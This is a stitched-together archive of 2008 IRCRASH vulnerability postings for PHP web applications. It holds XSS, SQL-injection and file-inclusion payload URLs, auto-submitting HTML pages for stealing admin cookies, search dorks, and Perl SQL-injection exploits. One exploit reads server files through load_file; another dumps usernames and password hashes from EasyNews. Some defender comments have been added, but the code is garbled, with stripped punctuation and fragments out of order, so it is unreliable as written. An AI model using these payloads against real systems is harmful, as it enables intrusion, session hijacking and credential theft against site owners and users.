# Defender notes:
#  - load_file() only returns data when the database account used by the web
#    application holds the FILE privilege and the file is readable by the
#    MySQL server process; revoking FILE from the application account and
#    setting secure_file_priv removes this file-disclosure path even while
#    the SQL injection itself is unpatched.
#  - Log indicators are the same as for xpl1, with `load_file(` in the query
#    string.
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
# The path is read from standard input and placed into the query unchanged.
$fil3 = stdin;

$vul = 
/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*;
$requestpage = $url.$vul;
 
# Request set-up is identical to xpl1 (same User-Agent and Referer values).
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
# The returned file content sits between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
# Store the extracted text locally; the message below names source.txt.
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

* Easydynamicpages 30tr Exploit*

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : Find mysql username

VistaReseller Panel BETA Xss Vulnerability

2008-06-16 Thread irancrash
##

# VistaReseller Panel BETA Xss Vulnerability

##

# Discovered By Khashayar Fereidani Or Ircrash

# Our Team : IRCRASH

# IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr

# Risk : Low

##

# Xss Address : http://Example/panel/index.php?option=forums

# Variable : [resellerdomain]

##

# How Work With it :

# Login In VistaReseller Panel And Open Url

# Insert http://;scriptalert('xss')/script in Text box and click (Add) 
Button .

# Now Open the Url Again  See xss msg

##

# Solution : Edit the source code and filter the variable with the htmlspecialchars() function before it is stored or displayed ...

##

# Khashayar Fereidani Email : irancrash[at]gmail[at]com

# Tnx : God 

##


Maian Uploader v4.0 XSS Vulnerabilities

2008-05-05 Thread irancrash


Script : Maian Uploader v4.0

Type : XSS Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://localhost/maian/upload/admin/index.php?cmd=searchprocess=1keywords=;scriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script

XSS 3 : 
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script

XSS 4 : 
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script

XSS 5 : 
http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




LifeType 1.2.8

2008-05-05 Thread irancrash


Script : LifeType 1.2.8

Type : XSS Vulnerability



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : 
http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2



Type : Cross Site Scripting

Method Of Send : POST

File Name : http://Example/admin.php?op=editArticleCategories

Vulnerable Variable : newBlogUserName

Set Add this user Variable : Add

Set op Variable : addBlogUser

You Can Get Admin Cookie With This Vuln 



Exploit :

Upload This Page And Send Link For Administrator .



html

head/head

#Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash

body onLoad=javascript:document.form.submit()


form action=http://Example/lifetype/admin.php?op=editArticleCategories;


method=POST name=form


input type=hidden name=newBlogUserName value=#x22;#x20;[XSS CODE]

input type=hidden name=Add this user value=Add

input type=hidden name=op value=addBlogUser


/form

/body

/html





Solution : Edit the source code and filter the newBlogUserName variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com

IRCRASH TEAM - Http://IRCRASH.COM/




Maian Gallery v2.0 XSS Vulnerability

2008-05-03 Thread irancrash


Script : Maian Gallery v2.0

Type : XSS Vulnerability



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



Xss 1 : 
http://Example/admin/index.php?cmd=searchsearch=1keywords=;scriptalert(document.cookie)/script



Solution : Edit the source code and filter the variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Cart v1.1 XSS Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Cart v1.1

Type : XSS Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://Example/admin/inc/header.php?msg_adminheader=scriptalert(document.cookie)/script

XSS 2 : 
http://Example/admin/inc/header.php?msg_adminheader2=scriptalert(document.cookie)/script

XSS 3 : 
http://Example/admin/inc/header.php?msg_adminheader3=scriptalert(document.cookie)/script

XSS 4 : 
http://Example/admin/inc/header.php?msg_adminheader4=scriptalert(document.cookie)/script

Many Variable have Xss Vuln In header.php

Xss 5 : 
http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script

Many Variable have Xss Vuln In footer.php

Xss 6 : 
http://Example/maian/cart/index.php?cmd=searchkeywords=scriptalert(document.cookie)/scriptx=0y=0



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION)

2008-05-03 Thread irancrash


Script : Maian Search v1.1

Type : Multiple Vulnerabilities (XSS/SQL INJECTION)



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



SQL INJECTION : http://Example/search.php?cmd=searchkeywords=[SQL INJECTION]



XSS 1 : 
http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script

XSS 3 : 
http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script

XSS 4 : 
http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script

XSS 5 : 
http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script

XSS 6 : 
http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script

XSS 7 : 
http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script

XSS 8 : 
http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script

XSS 9 : 
http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Guestbook v3.2 XSS Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Guestbook v3.2

Type : XSS Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script

XSS 2 : 
http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Weblog v4.0 XSS Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Weblog v4.0

Type : XSS Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://Example/admin/index.php?cmd=searchsearch=1area=blogskeywords=;scriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script

XSS 3 : 
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script

XSS 4 : 
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script

XSS 5 : 
http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION)

2008-05-03 Thread irancrash


Script : Maian Greeting v2.1

Type : Multiple Vulnerabilities (XSS/SQL INJECTION)



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



SQL INJECTION : http://Example/index.php?cmd=searchkeywords=[SQL 
INJECTION]cat=all



XSS 1 : 
http://Example/admin/inc/header.php?msg_script=;scriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Support v1.3 Xss Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Support v1.3

Type : Xss Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://Example/admin/inc/footer.php?msg_script=;scriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/footer.php?msg_script2=;scriptalert('xss')/script

XSS 3 : 
http://Example/admin/inc/footer.php?msg_script3=;scriptalert('xss')/script

XSS 4 : 
http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Recipe v1.2 Xss Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Recipe v1.2

Type : Xss Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : 
http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script

XSS 2 : 
http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script

XSS 3 : 
http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script

XSS 4 : 
http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script

XSS 5 : 
http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script

XSS 6 : 
http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script

XSS 7 : 
http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script

XSS 8 : 
http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script

XSS 9 : 
http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Music v1.1 Multiple Vulnerabilities (Xss/SQL Injection)

2008-05-03 Thread irancrash


Script : Maian Music v1.1

Type : Multiple Vulnerabilities (Xss/SQL Injection)



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



SQL INJECTION : http://Example/index.php?cmd=albumalbum=[SQL INJECTION]



XSS 1 : 
http://Example/index.php?cmd=searchkeywords=scriptalert(document.cookie)/script

XSS 2 : 
http://Example/admin/inc/footer.php?msg_script=scriptalert(document.cookie)/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




Maian Links v3.1 XSS Vulnerabilities

2008-05-03 Thread irancrash


Script : Maian Links v3.1

Type : XSS Vulnerabilities



Discovered by : Khashayar Fereidani Or Dr.Crash

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html



XSS 1 : http://Example/admin/inc/footer.php?msg_script3=  
scriptalert(document.cookie)/script

XSS 2 : 
http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script

You Can Get Admin Session With This Vuln 



Solution : Edit the source code and filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




BlackBook v1.0 Multiple XSS Vulnerabilities

2008-05-02 Thread irancrash


Script : BlackBook v1.0

Type : Multiple XSS Vulnerabilities



Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://membres.lycos.fr/eejj33/download/blackbook10.zip



XSS 1 : 
http://Example/blackbook/footer.php?bookCopyright=scriptalert(document.cookie)/script

XSS 2 : 
http://Example/blackbook/footer.php?ver=scriptalert(document.cookie)/script

XSS 3 : http://Example/blackbook/header.php?bookName=/title 
scriptalert(document.cookie)/script

XSS 4 : http://Example/blackbook/header.php?bookMetaTags=; 
scriptalert(document.cookie)/script

XSS 5 : http://Example/blackbook/header.php?estiloCSS=; 
scriptalert(document.cookie)/script



Solution : Filter each variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrashatgmaildotcom




Lifetype 1.2.7 XSS Vulnerability

2008-05-02 Thread irancrash


Script : Lifetype 1.2.7

Type : XSS Vulnerabilities



Discovered by : Dr.Crash Or Khashayar Fereidani

Our Team : IRCRASH



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : 
http://garr.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.7.tar.bz2



URL : http://Example/admin.php?op=editArticleCategories

Method : Post

variable : searchTerms

Query For Send :  [XSS CODE]

Example : Send With Post :  scriptalert(document.cookie)/script



You Can Get Admin Cookie With It

Upload This File And Send This Page For Admin 

HTML PAGE FOR GET ADMIN COOKIE :

html

head/head

body onLoad=javascript:document.form.submit()


form action=http://Example/lifetype/admin.php?op=editArticleCategories;


method=POST name=form


input type=hidden name=searchTerms value=#x22;#x20; [XSS CODE]


/form

/body

/html



Solution : Edit the source code and filter the searchTerms variable with the htmlspecialchars() function ...



TNx : God..

Khashayar Fereidani Email : irancrash[at]gmail[dot]com




vlBook 1.21 (ALL VERSION)

2008-05-01 Thread irancrash


Script : vlBook 1.21 (ALL VERSION)

Type : Multiple Remote Vulnerabilities (LFI/XSS)



Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)



Our Site : Http://IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://home.vlab.info/vlbook_1.21.zip



DORK : Powered by  vlBook 1.21



#XSS Address : http://example/?l=; scriptalert('xss')/script



#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00



TNx : God..




mjguest 6.7 (ALL VERSION) Xss Redirection Vuln

2008-05-01 Thread irancrash


Script : mjguest 6.7 (ALL VERSION)

Type : Multiple Remote Vulnerabilities (XSS/REDIRECTION)



Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)



Our Site : Http://IRCRASH.COM

IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



Script Download : http://www.mdsjack.bo.it/files/mjguest_6.7gt.zip



#XSS  REDIRECT Address : 
http://example/mjguest/mjguest.php?do=redirectlevel= [XSS 
CODE]alert=wrong_passgoto=[REDIRECT URL]

You Can Get Admin Session With THis Vuln .

# For Example : 
http://example/mjguest/mjguest.php?do=redirectlevel=scriptalert(document.cookie)/scriptalert=wrong_passgoto=http://ircrash.com



TNx : God..

Khashayar Fereidani Email : [EMAIL PROTECTED]




php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)

2008-05-01 Thread irancrash


Script : php-addressbook v2.0

Type : Multiple Remote Vulnerabilities (LFI/XSS)



Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)



Our Site : Http://IRCRASH.COM



IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr



DORK : php-addressbook v2.0 - Refreshed



#XSS Address : http://Example/pad/?username=; 
scriptalert(document.cookie)/script



#LFI Address : http://Example/pad/index.php?skin=../[FILENAME]$00



TNx : God..

Khashayar Fereidani Email : irancrash[At]Gmail.com




Minibb 2.2a XSS Vulnerability

2008-04-28 Thread irancrash
#

   Minibb 2.2a  
 

XSS Vulnerability   
 

#

#   
#

#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) 
#

#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)  
#

#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - 
Malc0de - R3d.w0rm - Rasool Nasr

#

#   
#

#Script Download : http://www.minibb.net/   
#

#   
#

#

#XSS  
#

#XSS Address : http://example/bb_admin.php?action=searchusers2whatus=; / 
scriptalert(document.cookie)/scriptsearchus=id

#   
#

# You Can Get Admin Cookie With This Vuln   
#

#   
#

#

#   Site : Http://IRCRASH.COM   
#

#TNX 
GOD#


Datalife Engine 6.7 XSRF

2008-04-02 Thread irancrash
#

  Datalife Engine 6.7 XSRF Vulnerability
 

   By IRCRASH   
 

#

#   
#

#Discovered by : IRCRASH (R3d.w0rm) 
#

#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm   
#

#   
#

#

#   
#

#Script Download : http://datalifecms.ir/download/DatalifeEngine6.7.zip

#   
#

#

# XSRF  
#

#XSRF Address : 
http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF]

#   
#

#

# Our site : Http://IRCRASH.COM 
#

#


EasyNews-40tr Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)

2008-04-01 Thread irancrash
#!/usr/bin/perl

#

   EasyNews-40tr
 

Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI) 
 

#

#   
#

#Discovered by : IRCRASH By Dr.Crash
#

#Exploited By : Dr.Crash
#

#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm   
#

#   
#

#

#   
#

#Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip  
#

#   
#

#

#XSS  
#

#XSS Address : 
http://Sitename/staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_pupublishread=scriptalert(document.cookie);/script

#   
#

#

#SQL  
#

#SQL Address : 
http://Sitename/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers

#   
#

#

#LFI  
#

#LFI Address : 
http://Sitename/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00

#   
#

#

# Our site : Http://IRCRASH.COM 
#

#


use LWP;

use HTTP::Request;

use Getopt::Long;

 

 

# header: prints the tool's banner (title, author and team credits, site).
# Takes no arguments; called from the top-level code below when no -url
# option was supplied.
# NOTE(review): this archived copy has lost some punctuation around the
# banner text, so the listing is not valid Perl as shown.
sub header

{

print 



*   EasyNews-40tr Sql Injection exploit*



*AUTHOR : IRCRASH  *

*Discovered by : IRCRASH TEAM BY Dr.Crash  *

*Exploited by : IRCRASH TEAM BY Dr.Crash   *

*Our Site : IRCRASH.COM*

;

}

 

# usage: prints the one-line command syntax; $0 is the script's own name and
# -url is the only option the script defines.
# NOTE(review): as with header(), the delimiters around the printed text are
# missing in this archived copy.
sub usage

{

  print 

* Usage : perl $0 -url http://Sitename/



;

}   
   

 

 

# Option parsing and request-path setup.
# NOTE(review): punctuation (string quotes and, it appears, the separators
# between query parameters) was stripped from this archived copy; the
# statements are kept exactly as archived.

# Getopt::Long stores the value of the single -url option (a string, per the
# "=s" spec) in %parameter.
my %parameter = ();

GetOptions(\%parameter, url=s);

 

$url = $parameter{url};

 

# Without a -url value, show the banner and the usage line, then stop.
if(!$url)

{

header();

usage();

exit;

}

# Normalise the base URL: append a slash when the value contains none, and
# prefix the http scheme when the value does not already contain it.
if($url !~ /\//){$url = $url./;}

if($url !~ /http:\/\//){$url = http://.$url;}

# $vul is the path and query string requested from /dynamicpages/index.php.
# It carries a UNION ALL SELECT that concatenates puUsername and puPassword
# from the edp_puusers table between marker strings; the hex literals decode
# to "Login:", "<enduser>", CRLF + "Password:" and "<endpass>".
# Defender note: this works only because the application places a request
# parameter (apparently `read` -- confirm against the application source)
# into its SQL text. The fix is a bound/parameterised query or a strict
# integer cast of that parameter. In web-server logs, requests to this path
# containing "union+all+select" or "edp_puusers" indicate probing. The
# script's closing message refers to MD5 password hashes, so stored
# credentials should also be migrated to a salted, slow password hash.
$vul = 
/dynamicpages/index.php?PageSection=7page=individualtable=edp_Help_Internal_Newsread=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers;

sub Exploit()

{

$requestpage = $url.$vul;

print Requesting Page is .$url.\n;

 

my $req  = HTTP::Request-new(POST,$requestpage);

$ua = LWP::UserAgent-new;

$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

#$req-referer($url);

$req-referer(IRCRASH.COM);

$req-content_type('application/x-www-form-urlencoded');

$req-header(content-length = $contlen);

$req-content($poststring);

 

$response = $ua-request($req);

$content = $response-content;

$header = $response-headers_as_string();

 

#Debug Modus delete # at beginning of next line

#print $content;

 

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/enduser/,$name);

$name = @name[0];

 

@password = split(/Password:/,$content);

$password = @password[1];

@password = split(/endpass/,$password);

$password = @password[0];


if(!$name  !$password)

{

print \n\n;

print !Exploit failed ! :(\n\n;

exit;

}

 

print Username: .$name.\n;

print Password:  .$password.\n\n;

print Crack Md5 Password And Login In : $url/admin/\n;

print Enjoy My friend